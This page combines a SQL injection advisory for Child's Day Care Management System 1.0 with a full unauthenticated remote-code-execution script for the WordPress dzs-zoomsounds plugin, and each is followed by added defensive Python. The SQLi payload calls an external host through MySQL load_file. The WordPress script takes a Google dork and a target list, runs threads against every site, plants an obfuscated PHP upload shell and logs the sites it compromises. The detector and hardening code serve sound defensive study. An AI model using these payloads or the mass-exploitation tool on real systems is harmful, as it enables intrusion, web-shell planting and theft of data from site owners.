<pre><code>## Title: Child's Day Care Management System 1.0 SQL - Injection
## Author: nu11secur1ty
## Date: 12.16.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html


## Description:
The `username` parameter of Login.php in Child's Day Care Management System 1.0
appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'
was submitted in the username parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. This system is also vulnerable to
SQL injection authentication bypass and stored XSS attacks. An attacker
can obtain all information from the system by using these vulnerabilities.
Status: CRITICAL

[+] Payload:

```mysql
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=zCAMOHlX'+(select load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'' AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND 'wBYn'='wBYn&password=a6O!j4g!Z5
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)

## Proof and Exploit:
[href](https://streamable.com/tvbuoi)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
 nu11secur1ty <http://nu11secur1ty.com/>
</code></pre>
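The advisory above gives a defender concrete markers to look for in login traffic: a quoted-string break followed by a sub-select, MySQL load_file() with a UNC path (the out-of-band interaction), SLEEP() (the time-based blind check), and the always-true string comparison sqlmap uses to close the quote. The following Python is an added example, not part of the advisory, that turns those markers into rules for reviewing POST bodies or feeding a WAF-style pre-filter. The sample bodies are constructed, and the collaborator host name is a placeholder rather than the advisory's domain. It does not replace the real fix, which is a parameterised query in Login.php.

```python
"""Flag SQL-injection indicators in login form submissions (added example).

The rules are derived from the payload in the advisory above; they are a
review aid, not a substitute for parameterised queries.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs

# Each rule names one feature of the advisory's payload.
INDICATORS = {
    # zCAMOHlX'+(select ...   -> string closed, sub-query opened
    "subquery_after_quote": re.compile(r"'\s*\+?\s*\(?\s*select\b", re.IGNORECASE),
    # load_file(...)          -> file read / out-of-band primitive
    "oob_load_file": re.compile(r"\bload_file\s*\(", re.IGNORECASE),
    # \\\\host\\share         -> UNC path forcing an outbound connection
    "unc_path": re.compile(r"\\{2,}[\w.-]+\\+"),
    # SLEEP(5)                -> time-based blind probe
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+", re.IGNORECASE),
    # AND 'wBYn'='wBYn        -> always-true comparison used to re-balance quotes
    "always_true_compare": re.compile(
        r"\b(?:and|or)\s+'([^']*)'\s*=\s*'\1", re.IGNORECASE
    ),
}


def scan_form_body(raw_body: str) -> Dict[str, List[str]]:
    """Return {parameter: [indicator names]} for every parameter that trips a rule.

    parse_qs performs the same decoding the PHP app would see ('+' -> space,
    %xx -> byte), so the rules run on the value as the database would get it.
    """
    findings: Dict[str, List[str]] = {}
    for name, values in parse_qs(raw_body, keep_blank_values=True).items():
        hits = sorted({k for v in values for k, rx in INDICATORS.items() if rx.search(v)})
        if hits:
            findings[name] = hits
    return findings


def is_injection_attempt(raw_body: str) -> bool:
    """True when any parameter matches at least one indicator."""
    return bool(scan_form_body(raw_body))


# Constructed sample bodies as they would appear in a request log.
# The host name is a placeholder, not the advisory's collaborator domain.
BENIGN_BODY = "username=alice&password=correct%20horse"
ATTACK_BODY = (
    "username=zCAMOHlX'+(select load_file('\\\\\\\\collaborator.invalid\\\\ztd'))+'' "
    "AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND 'wBYn'='wBYn"
    "&password=a6O!j4g!Z5"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("attack", ATTACK_BODY)):
        print(label, scan_form_body(body))
```

Only the `username` parameter should trip the rules on the attack body; the password value is ordinary text. Because the match is done on the decoded value, a payload that arrives URL-encoded is caught the same way as the plain form shown in the advisory.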
<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux

import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
    if not os.path.exists(directory):
        os.makedirs(directory)
Folder("exploited")
def clear():
    try:
        if os.name == 'nt':
            os.system('cls')
        else:
            os.system('clear')
    except:
        pass
def finder(i) :
    global Bad,Good
    head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
    try :
        x = requests.session()
        listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
        for script in listaa :
            url = (i+"/"+script)
            while True :
                req_first = x.get(url, headers=head)
                if "error:http raw post data does not exist" in req_first.text :
                    burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
                    burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
                    requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
                    urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
                    req_second = x.get(urlx, headers=head)
                    if "Overthinker1877" in req_second.text :
                        Good = Good + 1
                        print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
                        with open("exploited/shell.txt","a") as file :
                            file.write(urlx+"\n")
                            file.close()
                    else :
                        Bad = Bad + 1
                        print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
                else :
                    Bad = Bad + 1
                    print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")

                pass
                break
    except :
        pass
    if os.name == 'nt':
        ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
    else :
        sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))

def key_logo():
    clear = '\x1b[0m'
    colors = [36, 32, 34, 35, 31, 37]
    x = ' [ + ] OVERTHINKER1877 EXPLOIT'
    for N, line in enumerate(x.split('\n')):
        sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
        time.sleep(0.05)

def process(line):
    time.sleep(1)


def run() :
    key_logo()
    clear()
    print(""" 
 [-] -----------------------------------------[-]
 [+] WwW.1877.TeaM
 [-] -----------------------------------------[-]
 \n \n""")
    file_name = input("Website List : ")
    op = open(file_name,'r').read().splitlines()
    TEXTList = [list.strip() for list in op]
    p = Pool(int(input('Thread : ')))
    p.map(finder, TEXTList)

run()
 

</code></pre>
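The script above relies on savepng.php writing whatever raw POST body it receives to a file whose name comes straight from the `location` query parameter, inside the plugin directory, so a `.php` name plus a PHP body yields a web shell. A fix has to refuse both halves: a file name that is not a plain `.png` name, and a body that is not a PNG. The Python below is an added example of those checks, not the plugin's code (the plugin is PHP); the function names, the upload root, and the sample bodies are assumptions and constructed inputs. It also shows the write itself done so that an existing file is never overwritten and the created file is never executable. The `1877.php` name and the rejection of it come from the exploit on this page.

```python
"""Hardening a 'save this PNG' endpoint: validate the client-supplied name
and the body before writing (added example, not the plugin's own code)."""
import os
import shutil
import tempfile
from typing import List, Optional, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {".png"}


def location_problem(location: str, upload_root: str) -> Optional[str]:
    """Return why `location` must be rejected, or None if it is acceptable.

    The endpoint only ever needs to write one file directly under
    upload_root, so anything that looks like a path is refused outright
    rather than "cleaned".
    """
    if not location or "\x00" in location:
        return "empty name or NUL byte"
    if "/" in location or "\\" in location:
        return "path separators are not allowed"
    stem, ext = os.path.splitext(location)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return f"extension {ext!r} is not allowed"
    if not stem or "." in stem or stem.startswith("."):
        return "double extensions and hidden files are not allowed"
    if not all(c.isalnum() or c in "-_" for c in stem):
        return "stem may contain only letters, digits, '-' and '_'"
    # Belt and braces: the resolved path must still sit directly under the root.
    root = os.path.realpath(upload_root)
    final = os.path.realpath(os.path.join(root, location))
    if os.path.dirname(final) != root:
        return "resolved path escapes the upload root"
    return None


def png_body_problem(body: bytes) -> Optional[str]:
    """Return why `body` is not a PNG, or None if it passes the structural checks."""
    if len(body) < 16:  # 8-byte signature + first chunk length and type
        return "body too short to be a PNG"
    if not body.startswith(PNG_SIGNATURE):
        return "body does not start with the PNG signature"
    if body[12:16] != b"IHDR":
        return "first chunk is not IHDR"
    return None


def save_png(location: str, body: bytes, upload_root: str) -> str:
    """Validate name and body, then write without overwriting; returns the path."""
    problem = location_problem(location, upload_root) or png_body_problem(body)
    if problem:
        raise ValueError(problem)
    path = os.path.join(os.path.realpath(upload_root), location)
    # O_EXCL: fail instead of clobbering; 0o644: never an executable file.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(body)
    return path


def demo() -> List[Tuple[str, str]]:
    """Run the checks against constructed inputs in a scratch directory."""
    root = tempfile.mkdtemp(prefix="uploads-")
    # Minimal PNG prefix: signature, IHDR length (13), "IHDR", zeroed payload.
    tiny_png = PNG_SIGNATURE + (13).to_bytes(4, "big") + b"IHDR" + b"\x00" * 17
    cases = [
        ("cover.png", tiny_png),             # legitimate request
        ("1877.php", tiny_png),              # name used by the exploit above
        ("cover.png", b"<?php echo 1; ?>"),  # right name, script body
        ("../cover.png", tiny_png),          # traversal attempt
        ("shell.php.png", tiny_png),         # double extension
    ]
    outcomes = []
    try:
        for name, body in cases:
            try:
                save_png(name, body, root)
                outcomes.append((name, "saved"))
            except ValueError as exc:
                outcomes.append((name, f"rejected: {exc}"))
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return outcomes


if __name__ == "__main__":
    for name, result in demo():
        print(f"{name:15} {result}")
```

The name check is deliberately an allowlist (alphanumerics, `-`, `_`, single `.png` suffix) rather than a denylist of `.php`, because server configurations vary in which suffixes they execute. The body check is only structural; a full fix would also move the upload directory outside the document root or serve it with script execution disabled.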